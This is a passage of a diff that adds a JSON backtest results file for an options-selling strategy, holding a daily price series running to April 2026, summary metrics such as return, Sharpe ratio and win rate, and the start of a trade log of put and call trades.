], + [ + "2024-06-03", + 448.2076110839844 + ], + [ + "2024-06-04", + 449.43408203125 + ], + [ + "2024-06-05", + 458.49462890625 + ], + [ + "2024-06-06", + 458.3363342285156 + ], + [ + "2024-06-07", + 457.9307556152344 + ], + [ + "2024-06-10", + 459.780517578125 + ], + [ + "2024-06-11", + 462.9358215332031 + ], + [ + "2024-06-12", + 468.9992370605469 + ], + [ + "2024-06-13", + 471.5412902832031 + ], + [ + "2024-06-14", + 473.9844970703125 + ], + [ + "2024-06-17", + 479.790771484375 + ], + [ + "2024-06-18", + 479.9390869140625 + ], + [ + "2024-06-20", + 476.2397766113281 + ], + [ + "2024-06-21", + 474.9637145996094 + ], + [ + "2024-06-24", + 469.5564270019531 + ], + [ + "2024-06-25", + 474.9260559082031 + ], + [ + "2024-06-26", + 475.9068908691406 + ], + [ + "2024-06-27", + 477.1353454589844 + ], + [ + "2024-06-28", + 474.6585693359375 + ], + [ + "2024-07-01", + 477.4425048828125 + ], + [ + "2024-07-02", + 482.45550537109375 + ], + [ + "2024-07-03", + 486.4777526855469 + ], + [ + "2024-07-05", + 491.55023193359375 + ], + [ + "2024-07-08", + 492.71923828125 + ], + [ + "2024-07-09", + 493.1452331542969 + ], + [ + "2024-07-10", + 498.28704833984375 + ], + [ + "2024-07-11", + 487.3595275878906 + ], + [ + "2024-07-12", + 490.22265625 + ], + [ + "2024-07-15", + 491.540283203125 + ], + [ + "2024-07-16", + 491.7285461425781 + ], + [ + "2024-07-17", + 477.29388427734375 + ], + [ + "2024-07-18", + 475.03509521484375 + ], + [ + "2024-07-19", + 470.8245849609375 + ], + [ + "2024-07-22", + 477.8387756347656 + ], + [ + "2024-07-23", + 476.1545715332031 + ], + [ + "2024-07-24", + 459.07476806640625 + ], + [ + "2024-07-25", + 454.01220703125 + ], + [ + "2024-07-26", + 458.6685485839844 + ], + [ + "2024-07-29", + 459.5899658203125 + ], + [ + "2024-07-30", + 453.27911376953125 + ], + [ + "2024-07-31", + 466.6933288574219 + ], + [ + "2024-08-01", + 455.38934326171875 + ], + [ + "2024-08-02", + 444.5807189941406 + ], + [ + "2024-08-05", + 431.32501220703125 + ], + [ + "2024-08-06", + 435.4463806152344 + ], + [ + "2024-08-07", + 430.7305603027344 + ], + [ + "2024-08-08", + 443.9070129394531 + ], + [ + "2024-08-09", + 446.2253112792969 + ], + [ + "2024-08-12", + 447.186279296875 + ], + [ + "2024-08-13", + 458.28216552734375 + ], + [ + "2024-08-14", + 458.4308166503906 + ], + [ + "2024-08-15", + 470.01214599609375 + ], + [ + "2024-08-16", + 470.61651611328125 + ], + [ + "2024-08-19", + 476.79852294921875 + ], + [ + "2024-08-20", + 475.7979431152344 + ], + [ + "2024-08-21", + 478.0171203613281 + ], + [ + "2024-08-22", + 470.438232421875 + ], + [ + "2024-08-23", + 475.5403137207031 + ], + [ + "2024-08-26", + 470.92364501953125 + ], + [ + "2024-08-27", + 472.3304443359375 + ], + [ + "2024-08-28", + 466.970703125 + ], + [ + "2024-08-29", + 466.2870788574219 + ], + [ + "2024-08-30", + 471.844970703125 + ], + [ + "2024-09-03", + 457.5193176269531 + ], + [ + "2024-09-04", + 456.3304748535156 + ], + [ + "2024-09-05", + 456.7565002441406 + ], + [ + "2024-09-06", + 444.521240234375 + ], + [ + "2024-09-09", + 450.23760986328125 + ], + [ + "2024-09-10", + 454.39862060546875 + ], + [ + "2024-09-11", + 464.26605224609375 + ], + [ + "2024-09-12", + 468.8233337402344 + ], + [ + "2024-09-13", + 470.92364501953125 + ], + [ + "2024-09-16", + 468.8431396484375 + ], + [ + "2024-09-17", + 469.0908203125 + ], + [ + "2024-09-18", + 467.05987548828125 + ], + [ + "2024-09-19", + 478.8691101074219 + ], + [ + "2024-09-20", + 477.95770263671875 + ], + [ + "2024-09-23", + 479.224609375 + ], + [ + "2024-09-24", + 481.53619384765625 + ], + [ + "2024-09-25", + 481.9826354980469 + ], + [ + "2024-09-26", + 485.6037902832031 + ], + [ + "2024-09-27", + 482.9052734375 + ], + [ + "2024-09-30", + 484.21484375 + ], + [ + "2024-10-01", + 477.4685363769531 + ], + [ + "2024-10-02", + 478.1431884765625 + ], + [ + "2024-10-03", + 477.7860412597656 + ], + [ + "2024-10-04", + 483.47076416015625 + ], + [ + "2024-10-07", + 478.2919921875 + ], + [ + "2024-10-08", + 485.43511962890625 + ], + [ + "2024-10-09", + 489.2547302246094 + ], + [ + "2024-10-10", + 488.69915771484375 + ], + [ + "2024-10-11", + 489.4630432128906 + ], + [ + "2024-10-14", + 493.5703430175781 + ], + [ + "2024-10-15", + 486.972900390625 + ], + [ + "2024-10-16", + 487.03240966796875 + ], + [ + "2024-10-17", + 487.3697204589844 + ], + [ + "2024-10-18", + 490.5643005371094 + ], + [ + "2024-10-21", + 491.5068054199219 + ], + [ + "2024-10-22", + 492.04254150390625 + ], + [ + "2024-10-23", + 484.5025939941406 + ], + [ + "2024-10-24", + 488.4312744140625 + ], + [ + "2024-10-25", + 491.4075622558594 + ], + [ + "2024-10-28", + 491.4869689941406 + ], + [ + "2024-10-29", + 496.2093200683594 + ], + [ + "2024-10-30", + 492.459228515625 + ], + [ + "2024-10-31", + 480.0281677246094 + ], + [ + "2024-11-01", + 483.5799255371094 + ], + [ + "2024-11-04", + 482.171142578125 + ], + [ + "2024-11-05", + 488.3221740722656 + ], + [ + "2024-11-06", + 501.5865173339844 + ], + [ + "2024-11-07", + 509.483642578125 + ], + [ + "2024-11-08", + 510.0789489746094 + ], + [ + "2024-11-11", + 509.7813415527344 + ], + [ + "2024-11-12", + 508.85858154296875 + ], + [ + "2024-11-13", + 508.2038879394531 + ], + [ + "2024-11-14", + 504.6719970703125 + ], + [ + "2024-11-15", + 492.6477355957031 + ], + [ + "2024-11-18", + 496.0704650878906 + ], + [ + "2024-11-19", + 499.4832763671875 + ], + [ + "2024-11-20", + 499.1955871582031 + ], + [ + "2024-11-21", + 500.9913024902344 + ], + [ + "2024-11-22", + 501.7948913574219 + ], + [ + "2024-11-25", + 502.58856201171875 + ], + [ + "2024-11-26", + 505.28704833984375 + ], + [ + "2024-11-27", + 501.3087463378906 + ], + [ + "2024-11-29", + 505.7136535644531 + ], + [ + "2024-12-02", + 511.21978759765625 + ], + [ + "2024-12-03", + 512.787353515625 + ], + [ + "2024-12-04", + 519.126953125 + ], + [ + "2024-12-05", + 517.6882934570312 + ], + [ + "2024-12-06", + 522.3214721679688 + ], + [ + "2024-12-09", + 518.2537841796875 + ], + [ + "2024-12-10", + 516.4879150390625 + ], + [ + "2024-12-11", + 525.7341918945312 + ], + [ + "2024-12-12", + 522.34130859375 + ], + [ + "2024-12-13", + 526.3394775390625 + ], + [ + "2024-12-16", + 533.9191284179688 + ], + [ + "2024-12-17", + 531.5678100585938 + ], + [ + "2024-12-18", + 512.3905029296875 + ], + [ + "2024-12-19", + 510.1086730957031 + ], + [ + "2024-12-20", + 514.5632934570312 + ], + [ + "2024-12-23", + 519.5764770507812 + ], + [ + "2024-12-24", + 526.621826171875 + ], + [ + "2024-12-26", + 526.2640380859375 + ], + [ + "2024-12-27", + 519.2684326171875 + ], + [ + "2024-12-30", + 512.3621826171875 + ], + [ + "2024-12-31", + 508.0097961425781 + ], + [ + "2025-01-02", + 507.01611328125 + ], + [ + "2025-01-03", + 515.3134765625 + ], + [ + "2025-01-06", + 521.2359008789062 + ], + [ + "2025-01-07", + 511.9348449707031 + ], + [ + "2025-01-08", + 512.0243530273438 + ], + [ + "2025-01-10", + 503.9952087402344 + ], + [ + "2025-01-13", + 502.37548828125 + ], + [ + "2025-01-14", + 501.89849853515625 + ], + [ + "2025-01-15", + 513.4453735351562 + ], + [ + "2025-01-16", + 509.84814453125 + ], + [ + "2025-01-17", + 518.45361328125 + ], + [ + "2025-01-21", + 521.4942626953125 + ], + [ + "2025-01-22", + 528.1619873046875 + ], + [ + "2025-01-23", + 529.284912109375 + ], + [ + "2025-01-24", + 526.2938842773438 + ], + [ + "2025-01-27", + 510.97100830078125 + ], + [ + "2025-01-28", + 518.5230712890625 + ], + [ + "2025-01-29", + 517.54931640625 + ], + [ + "2025-01-30", + 519.7553100585938 + ], + [ + "2025-01-31", + 519.0000610351562 + ], + [ + "2025-02-03", + 514.8463745117188 + ], + [ + "2025-02-04", + 521.1663208007812 + ], + [ + "2025-02-05", + 523.5313720703125 + ], + [ + "2025-02-06", + 526.2640380859375 + ], + [ + "2025-02-07", + 519.6260986328125 + ], + [ + "2025-02-10", + 525.916259765625 + ], + [ + "2025-02-11", + 524.6641845703125 + ], + [ + "2025-02-12", + 524.9722900390625 + ], + [ + "2025-02-13", + 532.5244140625 + ], + [ + "2025-02-14", + 534.7601928710938 + ], + [ + "2025-02-18", + 535.9724731445312 + ], + [ + "2025-02-19", + 536.12158203125 + ], + [ + "2025-02-20", + 533.8458862304688 + ], + [ + "2025-02-21", + 522.7662963867188 + ], + [ + "2025-02-24", + 516.5953369140625 + ], + [ + "2025-02-25", + 510.08660888671875 + ], + [ + "2025-02-26", + 511.3187561035156 + ], + [ + "2025-02-27", + 497.1188049316406 + ], + [ + "2025-02-28", + 504.96905517578125 + ], + [ + "2025-03-03", + 493.9190673828125 + ], + [ + "2025-03-04", + 492.42852783203125 + ], + [ + "2025-03-05", + 498.84783935546875 + ], + [ + "2025-03-06", + 485.12481689453125 + ], + [ + "2025-03-07", + 488.6922302246094 + ], + [ + "2025-03-10", + 469.7522888183594 + ], + [ + "2025-03-11", + 468.6294250488281 + ], + [ + "2025-03-12", + 473.9159240722656 + ], + [ + "2025-03-13", + 465.38995361328125 + ], + [ + "2025-03-14", + 476.638671875 + ], + [ + "2025-03-17", + 479.7290344238281 + ], + [ + "2025-03-18", + 471.5509033203125 + ], + [ + "2025-03-19", + 477.86090087890625 + ], + [ + "2025-03-20", + 476.2411804199219 + ], + [ + "2025-03-21", + 477.8111877441406 + ], + [ + "2025-03-24", + 488.29644775390625 + ], + [ + "2025-03-25", + 491.0829162597656 + ], + [ + "2025-03-26", + 482.04669189453125 + ], + [ + "2025-03-27", + 479.29998779296875 + ], + [ + "2025-03-28", + 466.68109130859375 + ], + [ + "2025-03-31", + 466.6611633300781 + ], + [ + "2025-04-01", + 470.4229736328125 + ], + [ + "2025-04-02", + 473.8562927246094 + ], + [ + "2025-04-03", + 448.4891357421875 + ], + [ + "2025-04-04", + 420.6339416503906 + ], + [ + "2025-04-07", + 421.6490478515625 + ], + [ + "2025-04-08", + 414.0557861328125 + ], + [ + "2025-04-09", + 463.7552185058594 + ], + [ + "2025-04-10", + 444.0306701660156 + ], + [ + "2025-04-11", + 452.2110900878906 + ], + [ + "2025-04-14", + 455.2762756347656 + ], + [ + "2025-04-15", + 455.7838134765625 + ], + [ + "2025-04-16", + 442.04034423828125 + ], + [ + "2025-04-17", + 441.9607238769531 + ], + [ + "2025-04-21", + 431.0236511230469 + ], + [ + "2025-04-22", + 442.33892822265625 + ], + [ + "2025-04-23", + 452.370361328125 + ], + [ + "2025-04-24", + 465.0987548828125 + ], + [ + "2025-04-25", + 470.28363037109375 + ], + [ + "2025-04-28", + 470.1343688964844 + ], + [ + "2025-04-29", + 473.23931884765625 + ], + [ + "2025-04-30", + 473.1795959472656 + ], + [ + "2025-05-01", + 479.35968017578125 + ], + [ + "2025-05-02", + 486.4752197265625 + ], + [ + "2025-05-05", + 483.5892333984375 + ], + [ + "2025-05-06", + 479.09100341796875 + ], + [ + "2025-05-07", + 480.97186279296875 + ], + [ + "2025-05-08", + 485.9378662109375 + ], + [ + "2025-05-09", + 485.6194152832031 + ], + [ + "2025-05-12", + 505.40362548828125 + ], + [ + "2025-05-13", + 513.1063232421875 + ], + [ + "2025-05-14", + 516.1814575195312 + ], + [ + "2025-05-15", + 516.7486572265625 + ], + [ + "2025-05-16", + 518.9978637695312 + ], + [ + "2025-05-19", + 519.4954223632812 + ], + [ + "2025-05-20", + 517.7638549804688 + ], + [ + "2025-05-21", + 510.56866455078125 + ], + [ + "2025-05-22", + 511.5240783691406 + ], + [ + "2025-05-23", + 506.78692626953125 + ], + [ + "2025-05-27", + 518.709228515625 + ], + [ + "2025-05-28", + 516.4102783203125 + ], + [ + "2025-05-29", + 517.4254150390625 + ], + [ + "2025-05-30", + 516.609375 + ], + [ + "2025-06-02", + 520.689697265625 + ], + [ + "2025-06-03", + 524.7598876953125 + ], + [ + "2025-06-04", + 526.222900390625 + ], + [ + "2025-06-05", + 522.2620239257812 + ], + [ + "2025-06-06", + 527.3672485351562 + ], + [ + "2025-06-09", + 528.1435546875 + ], + [ + "2025-06-10", + 531.63671875 + ], + [ + "2025-06-11", + 529.8452758789062 + ], + [ + "2025-06-12", + 531.0892944335938 + ], + [ + "2025-06-13", + 524.4215698242188 + ], + [ + "2025-06-16", + 531.7162475585938 + ], + [ + "2025-06-17", + 526.5313720703125 + ], + [ + "2025-06-18", + 526.4417114257812 + ], + [ + "2025-06-20", + 524.292236328125 + ], + [ + "2025-06-23", + 529.6832275390625 + ], + [ + "2025-06-24", + 537.783203125 + ], + [ + "2025-06-25", + 539.157958984375 + ], + [ + "2025-06-26", + 544.1992797851562 + ], + [ + "2025-06-27", + 546.0623779296875 + ], + [ + "2025-06-30", + 549.5992431640625 + ], + [ + "2025-07-01", + 544.9664306640625 + ], + [ + "2025-07-02", + 548.7623291015625 + ], + [ + "2025-07-03", + 554.1622924804688 + ], + [ + "2025-07-07", + 549.9878540039062 + ], + [ + "2025-07-08", + 550.2966918945312 + ], + [ + "2025-07-09", + 554.1921997070312 + ], + [ + "2025-07-10", + 553.3952026367188 + ], + [ + "2025-07-11", + 552.1497802734375 + ], + [ + "2025-07-14", + 554.1524047851562 + ], + [ + "2025-07-15", + 554.660400390625 + ], + [ + "2025-07-16", + 555.2283325195312 + ], + [ + "2025-07-17", + 559.7216186523438 + ], + [ + "2025-07-18", + 559.1836547851562 + ], + [ + "2025-07-21", + 562.0828857421875 + ], + [ + "2025-07-22", + 559.1737060546875 + ], + [ + "2025-07-23", + 561.7242431640625 + ], + [ + "2025-07-24", + 562.9197387695312 + ], + [ + "2025-07-25", + 564.2747192382812 + ], + [ + "2025-07-28", + 566.0382690429688 + ], + [ + "2025-07-29", + 565.1614990234375 + ], + [ + "2025-07-30", + 565.9186401367188 + ], + [ + "2025-07-31", + 562.9197387695312 + ], + [ + "2025-08-01", + 551.8309936523438 + ], + [ + "2025-08-04", + 562.0131225585938 + ], + [ + "2025-08-05", + 558.1973266601562 + ], + [ + "2025-08-06", + 565.2212524414062 + ], + [ + "2025-08-07", + 567.1340942382812 + ], + [ + "2025-08-08", + 572.4244995117188 + ], + [ + "2025-08-11", + 570.730712890625 + ], + [ + "2025-08-12", + 577.9041137695312 + ], + [ + "2025-08-13", + 578.193115234375 + ], + [ + "2025-08-14", + 577.7447509765625 + ], + [ + "2025-08-15", + 575.2042236328125 + ], + [ + "2025-08-18", + 574.9750366210938 + ], + [ + "2025-08-19", + 567.1740112304688 + ], + [ + "2025-08-20", + 563.8065185546875 + ], + [ + "2025-08-21", + 561.1962280273438 + ], + [ + "2025-08-22", + 569.85400390625 + ], + [ + "2025-08-25", + 568.210205078125 + ], + [ + "2025-08-26", + 570.4915771484375 + ], + [ + "2025-08-27", + 571.368408203125 + ], + [ + "2025-08-28", + 574.9451293945312 + ], + [ + "2025-08-29", + 568.2898559570312 + ], + [ + "2025-09-02", + 563.527587890625 + ], + [ + "2025-09-03", + 567.9610595703125 + ], + [ + "2025-09-04", + 573.1019287109375 + ], + [ + "2025-09-05", + 573.9288940429688 + ], + [ + "2025-09-08", + 576.728515625 + ], + [ + "2025-09-09", + 578.3624267578125 + ], + [ + "2025-09-10", + 578.5517578125 + ], + [ + "2025-09-11", + 581.9192504882812 + ], + [ + "2025-09-12", + 584.4896850585938 + ], + [ + "2025-09-15", + 589.4910888671875 + ], + [ + "2025-09-16", + 588.992919921875 + ], + [ + "2025-09-17", + 587.8173217773438 + ], + [ + "2025-09-18", + 593.11767578125 + ], + [ + "2025-09-19", + 597.1326904296875 + ], + [ + "2025-09-22", + 600.667724609375 + ], + [ + "2025-09-23", + 596.6779174804688 + ], + [ + "2025-09-24", + 594.583251953125 + ], + [ + "2025-09-25", + 592.0198364257812 + ], + [ + "2025-09-26", + 594.4535522460938 + ], + [ + "2025-09-29", + 597.20654296875 + ], + [ + "2025-09-30", + 598.8424072265625 + ], + [ + "2025-10-01", + 601.7150268554688 + ], + [ + "2025-10-02", + 604.188720703125 + ], + [ + "2025-10-03", + 601.645263671875 + ], + [ + "2025-10-06", + 606.1636962890625 + ], + [ + "2025-10-07", + 602.9718627929688 + ], + [ + "2025-10-08", + 609.8842163085938 + ], + [ + "2025-10-09", + 609.1461181640625 + ], + [ + "2025-10-10", + 588.0000610351562 + ], + [ + "2025-10-13", + 600.4782104492188 + ], + [ + "2025-10-14", + 596.4784545898438 + ], + [ + "2025-10-15", + 600.6876831054688 + ], + [ + "2025-10-16", + 598.46337890625 + ], + [ + "2025-10-17", + 602.393310546875 + ], + [ + "2025-10-20", + 609.9839477539062 + ], + [ + "2025-10-21", + 609.8244018554688 + ], + [ + "2025-10-22", + 603.9493408203125 + ], + [ + "2025-10-23", + 609.0264282226562 + ], + [ + "2025-10-24", + 615.52978515625 + ], + [ + "2025-10-27", + 626.4918823242188 + ], + [ + "2025-10-28", + 631.3095703125 + ], + [ + "2025-10-29", + 634.15234375 + ], + [ + "2025-10-30", + 624.45703125 + ], + [ + "2025-10-31", + 627.4694213867188 + ], + [ + "2025-11-03", + 630.4716796875 + ], + [ + "2025-11-04", + 617.67431640625 + ], + [ + "2025-11-05", + 621.6941528320312 + ], + [ + "2025-11-06", + 610.1136474609375 + ], + [ + "2025-11-07", + 608.1885375976562 + ], + [ + "2025-11-10", + 621.6442260742188 + ], + [ + "2025-11-11", + 619.9884643554688 + ], + [ + "2025-11-12", + 619.4996948242188 + ], + [ + "2025-11-13", + 606.8519897460938 + ], + [ + "2025-11-14", + 607.310791015625 + ], + [ + "2025-11-17", + 602.1240234375 + ], + [ + "2025-11-18", + 594.7926635742188 + ], + [ + "2025-11-19", + 598.3436279296875 + ], + [ + "2025-11-20", + 584.1797485351562 + ], + [ + "2025-11-21", + 588.568603515625 + ], + [ + "2025-11-24", + 603.6201782226562 + ], + [ + "2025-11-25", + 607.3407592773438 + ], + [ + "2025-11-26", + 612.70703125 + ], + [ + "2025-11-28", + 617.67431640625 + ], + [ + "2025-12-01", + 615.599609375 + ], + [ + "2025-12-02", + 620.4172973632812 + ], + [ + "2025-12-03", + 621.9334716796875 + ], + [ + "2025-12-04", + 621.35498046875 + ], + [ + "2025-12-05", + 623.8884887695312 + ], + [ + "2025-12-08", + 622.6915283203125 + ], + [ + "2025-12-09", + 623.4595336914062 + ], + [ + "2025-12-10", + 626.0130615234375 + ], + [ + "2025-12-11", + 623.98828125 + ], + [ + "2025-12-12", + 612.0586547851562 + ], + [ + "2025-12-15", + 608.9865112304688 + ], + [ + "2025-12-16", + 610.1934204101562 + ], + [ + "2025-12-17", + 598.8822631835938 + ], + [ + "2025-12-18", + 607.5601196289062 + ], + [ + "2025-12-19", + 615.47998046875 + ], + [ + "2025-12-22", + 618.4302368164062 + ], + [ + "2025-12-23", + 621.3265380859375 + ], + [ + "2025-12-24", + 623.144287109375 + ], + [ + "2025-12-26", + 623.1043090820312 + ], + [ + "2025-12-29", + 620.088134765625 + ], + [ + "2025-12-30", + 618.64990234375 + ], + [ + "2025-12-31", + 613.536376953125 + ], + [ + "2026-01-02", + 612.347900390625 + ], + [ + "2026-01-05", + 617.2117309570312 + ], + [ + "2026-01-06", + 622.6348876953125 + ], + [ + "2026-01-07", + 623.2341918945312 + ], + [ + "2026-01-08", + 619.6885986328125 + ], + [ + "2026-01-09", + 625.86083984375 + ], + [ + "2026-01-12", + 626.3801879882812 + ], + [ + "2026-01-13", + 625.4513549804688 + ], + [ + "2026-01-14", + 618.769775390625 + ], + [ + "2026-01-15", + 620.9970092773438 + ], + [ + "2026-01-16", + 620.4776611328125 + ], + [ + "2026-01-20", + 607.2942504882812 + ], + [ + "2026-01-21", + 615.50390625 + ], + [ + "2026-01-22", + 619.978271484375 + ], + [ + "2026-01-23", + 621.935791015625 + ], + [ + "2026-01-26", + 624.67236328125 + ], + [ + "2026-01-27", + 630.335205078125 + ], + [ + "2026-01-28", + 632.4225463867188 + ], + [ + "2026-01-29", + 628.6373291015625 + ], + [ + "2026-01-30", + 621.0868530273438 + ], + [ + "2026-02-02", + 625.3515014648438 + ], + [ + "2026-02-03", + 615.7435913085938 + ], + [ + "2026-02-04", + 604.9871826171875 + ], + [ + "2026-02-05", + 596.2781982421875 + ], + [ + "2026-02-06", + 608.8822631835938 + ], + [ + "2026-02-09", + 613.54638671875 + ], + [ + "2026-02-10", + 610.699951171875 + ], + [ + "2026-02-11", + 612.337890625 + ], + [ + "2026-02-12", + 599.8836059570312 + ], + [ + "2026-02-13", + 601.1619873046875 + ], + [ + "2026-02-17", + 600.542724609375 + ], + [ + "2026-02-18", + 605.027099609375 + ], + [ + "2026-02-19", + 602.7100219726562 + ], + [ + "2026-02-20", + 608.0433349609375 + ], + [ + "2026-02-23", + 600.652587890625 + ], + [ + "2026-02-24", + 607.1044921875 + ], + [ + "2026-02-25", + 615.9033813476562 + ], + [ + "2026-02-26", + 608.4727783203125 + ], + [ + "2026-02-27", + 606.5252075195312 + ], + [ + "2026-03-02", + 607.32421875 + ], + [ + "2026-03-03", + 600.8224487304688 + ], + [ + "2026-03-04", + 609.9808959960938 + ], + [ + "2026-03-05", + 608.1431274414062 + ], + [ + "2026-03-06", + 598.9946899414062 + ], + [ + "2026-03-09", + 606.99462890625 + ], + [ + "2026-03-10", + 607.004638671875 + ], + [ + "2026-03-11", + 606.9247436523438 + ], + [ + "2026-03-12", + 596.5078735351562 + ], + [ + "2026-03-13", + 592.9722900390625 + ], + [ + "2026-03-16", + 599.6239013671875 + ], + [ + "2026-03-17", + 602.5502319335938 + ], + [ + "2026-03-18", + 594.15087890625 + ], + [ + "2026-03-19", + 592.273193359375 + ], + [ + "2026-03-20", + 581.3269653320312 + ], + [ + "2026-03-23", + 588.0 + ], + [ + "2026-03-24", + 583.97998046875 + ], + [ + "2026-03-25", + 587.8200073242188 + ], + [ + "2026-03-26", + 573.7899780273438 + ], + [ + "2026-03-27", + 562.5800170898438 + ], + [ + "2026-03-30", + 558.280029296875 + ], + [ + "2026-03-31", + 577.1799926757812 + ], + [ + "2026-04-01", + 584.3099975585938 + ], + [ + "2026-04-02", + 584.97998046875 + ], + [ + "2026-04-06", + 588.5 + ], + [ + "2026-04-07", + 588.5900268554688 + ], + [ + "2026-04-08", + 606.0900268554688 + ], + [ + "2026-04-09", + 610.1900024414062 + ], + [ + "2026-04-10", + 611.0700073242188 + ], + [ + "2026-04-13", + 617.3900146484375 + ], + [ + "2026-04-14", + 628.5999755859375 + ], + [ + "2026-04-15", + 637.4000244140625 + ], + [ + "2026-04-16", + 640.469970703125 + ], + [ + "2026-04-17", + 648.8499755859375 + ], + [ + "2026-04-20", + 646.7899780273438 + ], + [ + "2026-04-21", + 644.3300170898438 + ], + [ + "2026-04-22", + 655.1099853515625 + ], + [ + "2026-04-23", + 651.4199829101562 + ] + ], + "metrics": { + "total_return": 21.203246816790934, + "final_value": 12120.324681679094, + "cagr": 3.928013990277779, + "sharpe": 0.15407662226007332, + "max_dd": -12.80745424951754, + "n_trades": 167, + "wins": 137, + "losses": 30, + "win_rate": 82.03592814371258, + "avg_win": 40.5684761051716, + "avg_loss": -146.16866231788606, + "chain_quotes": 0, + "bs_quotes": 649 + }, + "trade_log": [ + { + "date": "2021-05-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 24.96, + "spot": 25.28704071044922, + "premium": 0.38631203422278126, + "close_cost": 0.0, + "pnl": 32.65120342227813, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-05-10 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 23.77, + "spot": 22.923093795776367, + "premium": 0.36890664413529617, + "close_cost": 0.8469062042236324, + "pnl": -50.78995600883362, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-05-12 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 23.38, + "spot": 21.07253074645996, + "premium": 0.686294375067316, + "close_cost": 0.08787221108146825, + "pnl": 53.86221639858478, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-05-19 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 21.49, + "spot": 22.137500762939453, + "premium": 0.6319173330910548, + "close_cost": 0.6475007629394547, + "pnl": -4.548342984839989, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-05-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 20.81, + "spot": 23.417375564575195, + "premium": 0.3231207559898408, + "close_cost": 0.0846631708579515, + "pnl": 17.86575851318893, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-06-01 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 23.07, + "spot": 24.25788688659668, + "premium": 0.3580163906148872, + "close_cost": 0.032470210138792144, + "pnl": 26.57461804760951, + "hold_days": 6, + "result": "Win" + }, + { + "date": "2021-06-04 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 22.2, + "spot": 24.82857894897461, + "premium": 0.31644787396552587, + "close_cost": 0.10377247602677198, + "pnl": 15.28753979387539, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-09-22 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 29.96, + "spot": 32.84927749633789, + "premium": 0.14406755176237596, + "close_cost": 0.015117323303504016, + "pnl": 6.915022845887194, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-04 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 31.06, + "spot": 28.424638748168945, + "premium": 0.12741147690431642, + "close_cost": 2.6353612518310534, + "pnl": -253.7849774926737, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-11 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 28.99, + "spot": 29.764209747314453, + "premium": 0.6224747145026246, + "close_cost": 0.7742097473144547, + "pnl": -18.16350328118301, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-10-13 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 27.98, + "spot": 30.15103530883789, + "premium": 0.3289931723170989, + "close_cost": 0.15903902627129707, + "pnl": 11.015414604580183, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-20 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 31.37, + "spot": 34.002586364746094, + "premium": 0.370814921348944, + "close_cost": 0.14987541305504948, + "pnl": 16.113950829389452, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-10-26 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.66, + "spot": 35.07234191894531, + "premium": 0.3887161829488832, + "close_cost": 0.13603628153566127, + "pnl": 19.287990141322194, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-11-11 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.7, + "spot": 38.291114807128906, + "premium": 0.16039954890210328, + "close_cost": 0.06107808684612648, + "pnl": 3.95214620559768, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2021-11-29 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.38, + "spot": 40.791175842285156, + "premium": 0.1399673799605603, + "close_cost": 0.0, + "pnl": 8.01673799605603, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-06 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.34, + "spot": 36.674564361572266, + "premium": 0.30739867902550433, + "close_cost": 1.6654356384277378, + "pnl": -138.79369594022336, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2021-12-13 00:00:00", + "type": "CALL", + "action": "Call_Away", + "strike": 37.41, + "spot": 38.26963806152344, + "premium": 0.9146644007297766, + "close_cost": 0.8596380615234409, + "pnl": 2.5126339206335704, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2021-12-15 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 35.97, + "spot": 39.58770751953125, + "premium": 0.6238188603607728, + "close_cost": 0.27060152818170113, + "pnl": 29.341733217907166, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2021-12-21 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 32.84, + "spot": 37.26674270629883, + "premium": 0.7326970251093812, + "close_cost": 0.2608151733408697, + "pnl": 41.208185176851146, + "hold_days": 1, + "result": "Win" + }, + { + "date": "2022-01-03 00:00:00", + "type": "PUT", + "action": "TP_Close", + "strike": 38.92, + "spot": 40.8628044128418, + "premium": 0.9664373580958614, + "close_cost": 0.0, + "pnl": 90.66373580958613, + "hold_days": 7, + "result": "Win" + }, + { + "date": "2022-01-10 00:00:00", + "type": "PUT", + "action": "Assigned", + "strike": 38.41, + "spot": 34.52791213989258, + "premium": 0.7459519980105771, + "close_cost": 3.8820878601074185, + "pnl": -316.6035862096841, + "hold_days": 7, + "result": "Loss" + }, + { + "date": "2022-01-18 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 35.22, + "spot": 31.84878158569336, + "premium": 1.1811501040198262, + "close_cost": 0.0, + "pnl": 112.13501040198263, + "hold_days": 8, + "result": "Win" + }, + { + "date": "2022-01-20 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 32.49, + "spot": 29.55168914794922, + "premium": 1.0857059985367101, + "close_cost": 0.17374453772104825, + "pnl": 85.21614608156618, + "hold_days": 2, + "result": "Win" + }, + { + "date": "2022-01-21 00:00:00", + "type": "CALL", + "action": "TP_Close", + "strike": 30.14, + "spot": 27.063579559326172, + 